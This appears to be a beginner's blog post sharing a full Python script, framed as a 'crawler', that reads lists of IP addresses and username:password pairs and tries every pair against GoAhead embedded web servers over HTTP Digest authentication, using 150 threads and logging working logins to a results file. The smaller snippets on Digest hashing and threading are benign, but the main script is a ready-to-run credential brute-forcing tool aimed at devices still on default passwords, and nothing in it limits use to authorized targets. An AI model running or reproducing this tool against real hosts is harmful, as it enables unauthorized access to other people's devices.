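I have recently been learning to write crawlers in Python. One day I happened to notice that GoAhead servers handle login differently from most websites: they do not use a POST form. After some reading I found that GoAhead is an open-source (commercially licensed), simple, lightweight, yet capable embedded web server that runs on many platforms. Most GoAhead servers use HTTP Digest authentication, and some are still left on their default account and password, which gave me the idea of writing a crawler aimed at GoAhead. After nearly 8 hours of coding and debugging I managed to get a crude script working. I am sharing it here as a reference for Python beginners, and any pointers from passing experts are welcome, haha.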
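For a beginner, the hard part of this script is getting Python to fill in the account and password and log in automatically. I spent nearly two hours going through various sites and concluded that the get() function of the third-party requests module is the most convenient: you pass the URL, the authentication method, and the account and password, and it performs the login for you.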
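To make it clearer what requests does when it is given a Digest auth object, here is a minimal sketch of how the `response` field of a Digest login is computed for the MD5 algorithm with `qop=auth`, as described in RFC 2617. The function names `md5_hex` and `digest_response` are my own for illustration and are not part of requests; the input values are the ones from the RFC's worked example, not from any real device.

```python
import hashlib


def md5_hex(text: str) -> str:
    """Return the lowercase hex MD5 digest of a UTF-8 string."""
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def digest_response(username, realm, password, method, uri,
                    nonce, nc, cnonce, qop="auth"):
    """Compute the Digest `response` value for MD5 with qop=auth."""
    # HA1 binds the credentials to the realm announced by the server.
    ha1 = md5_hex(f"{username}:{realm}:{password}")
    # HA2 binds the request method and the requested URI.
    ha2 = md5_hex(f"{method}:{uri}")
    # The final hash mixes in the server nonce and the client counters.
    return md5_hex(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")


# Values taken from the worked example in RFC 2617.
example = digest_response(
    username="Mufasa",
    realm="testrealm@host.com",
    password="Circle Of Life",
    method="GET",
    uri="/dir/index.html",
    nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093",
    nc="00000001",
    cnonce="0a4f113b",
)
print(example)
```

The password itself never travels over the wire, only the hash. With requests, the 401 challenge, this computation, and the retry are all handled internally, which is why the script only has to supply the account and password.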
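The other hard part is multithreading, though anyone who has written multithreaded code in another language will find it fairly easy. If it is unfamiliar, look it up; I will not go into it here.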
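For readers who have not used threads in Python before, the following is a rough sketch of the two ideas the script relies on: splitting a list of work items across a fixed number of threads, and using a lock when threads share one output. The helper names `partition` and `run_workers` and the placeholder host names are assumptions made for this example only.

```python
import threading


def partition(items, worker_count):
    """Give worker i the items at positions i, i + worker_count, ..."""
    return [items[i::worker_count] for i in range(worker_count)]


def run_workers(items, worker_count, handle):
    """Run handle(item) across worker_count threads and collect results."""
    results = []
    lock = threading.Lock()

    def work(chunk):
        for item in chunk:
            value = handle(item)
            # Only one thread at a time may touch the shared list.
            with lock:
                results.append(value)

    threads = [
        threading.Thread(target=work, args=(chunk,))
        for chunk in partition(items, worker_count)
    ]
    for thread in threads:
        thread.start()
    for thread in threads:
        # Wait for every worker to finish before returning.
        thread.join()
    return results


hosts = [f"host-{n}" for n in range(7)]  # placeholder names, not real targets
print(partition(hosts, 3))
print(sorted(run_workers(hosts, 3, str.upper)))
```

The order in which results arrive depends on thread scheduling, so the example sorts them before printing.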
The complete code is attached below:
from requests.auth import HTTPDigestAuth
import requests
import threading
import sys
import os
import time

ip_file_name = 'ip.txt'
password_file_name = 'password.txt'
results_file_name = 'results.txt'
ip_count = 0
thread_count = 0
default_thread_count = 150
# Serializes writes to the shared results file.
results_lock = threading.Lock()


# Read ip_file: one host per line, returned as http:// URLs.
def get_ip():
    if not os.path.exists(ip_file_name):
        print("ip file doesn't exist!\n")
        sys.exit(-1)
    with open(ip_file_name, 'r') as f:
        return ['http://' + line.strip() for line in f if line.strip()]


# Read password_file: one username:password entry per line.
def get_password():
    if not os.path.exists(password_file_name):
        print("password file doesn't exist!\n")
        sys.exit(-1)
    credentials = []
    with open(password_file_name, 'r') as f:
        for line in f:
            entry = line.rstrip('\r\n')
            if not entry:
                continue
            # Split at the first colon into username and password.
            username, colon, password = entry.partition(':')
            if not colon:
                print(entry + " doesn't conform to the specifications")
                sys.exit(1)
            # '<empty>' stands for an empty password.
            if password == '<empty>':
                password = ''
            credentials.append((username, password))
    return credentials


class MyThread(threading.Thread):
    def __init__(self, thread_index, ip_list, pass_list, results_file):
        threading.Thread.__init__(self)
        self.thread_index = thread_index
        self.ip_list = ip_list
        self.pass_list = pass_list
        self.results_file = results_file

    def run(self):
        # Thread i handles IPs i, i + thread_count, i + 2 * thread_count, ...
        for ip in self.ip_list[self.thread_index::thread_count]:
            try:
                # Check whether the target uses Digest authentication.
                headers = str(requests.get(ip, timeout=6).headers)
            except requests.RequestException:
                continue
            if 'Digest' not in headers:
                continue
            self.try_logins(ip)

    def try_logins(self, ip):
        # Count failed requests per IP; the counter must live outside the loop.
        timeouts = 0
        # Loop to submit each account and password.
        for username, password in self.pass_list:
            # Sleep 0.1 second to prevent overloading the target.
            time.sleep(0.1)
            try:
                # Start Digest authentication.
                response = requests.get(
                    ip,
                    auth=HTTPDigestAuth(username, password),
                    timeout=5
                )
            except requests.RequestException:
                # If there are too many timeouts, check the next IP.
                timeouts += 1
                if timeouts == 15:
                    break
                continue
            # If the status code is 200, the login succeeded.
            if response.status_code == 200:
                print('login ' + ip + ' success!')
                with results_lock:
                    self.results_file.write(ip + ' ' + username + ' ' + password + '\n')
                break


if __name__ == '__main__':
    ip_list = get_ip()
    pass_list = get_password()
    if len(ip_list) == 0 or len(pass_list) == 0:
        print('please fill ip, username or password file')
        sys.exit(-1)

    ip_count = len(ip_list)
    thread_count = min(ip_count, default_thread_count)

    print('start to work...')
    # Create threads and run them.
    threads = []
    with open(results_file_name, mode='a') as results_file:
        for thread_index in range(thread_count):
            thread = MyThread(thread_index, ip_list, pass_list, results_file)
            thread.start()
            threads.append(thread)
        for thread in threads:
            # Wait for all threads to end.
            thread.join()
    print('All work has been completed.')
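The script runs as follows:
1. Read the contents of ip.txt and password.txt.
2. Create the threads and start them.
3. Each thread loops over the IPs assigned to it. It first checks that the target exists and uses Digest authentication; if so, it starts looping through the logins. If too many requests time out during login, it skips the rest of the checks for that IP.
4. When the server returns status code 200, the login has succeeded: the IP, account, and password are written to results.txt, and the thread moves on to the next IP.
5. Once every thread has finished checking all of its assigned IPs, the program ends.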
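Two small pieces of steps 1 and 3 can be sketched on their own, without any network access: splitting a `username:password` entry from password.txt, and deciding whether a response's headers announce Digest authentication. The helpers `parse_credential` and `is_digest_challenge` are hypothetical names for this illustration. The header check here looks only at `WWW-Authenticate`, which is stricter than searching the whole header text, and it assumes the Digest scheme is listed first.

```python
def parse_credential(entry):
    """Split 'username:password' at the first colon.

    The literal password '<empty>' stands for an empty password.
    """
    username, colon, password = entry.partition(":")
    if not colon:
        raise ValueError(f"{entry!r} is not in username:password form")
    if password == "<empty>":
        password = ""
    return username, password


def is_digest_challenge(headers):
    """Return True if the WWW-Authenticate header starts with Digest.

    `headers` is a plain dict here, so the key lookup is case-sensitive;
    the headers object returned by requests is case-insensitive.
    """
    challenge = headers.get("WWW-Authenticate", "")
    return challenge.strip().lower().startswith("digest")


# Made-up sample values for illustration only.
print(parse_credential("admin:<empty>"))
print(parse_credential("user:pa:ss"))
print(is_digest_challenge({"WWW-Authenticate": 'Digest realm="demo", nonce="abc"'}))
print(is_digest_challenge({"WWW-Authenticate": 'Basic realm="demo"'}))
```

Splitting at the first colon only means a password may itself contain colons, while a username may not.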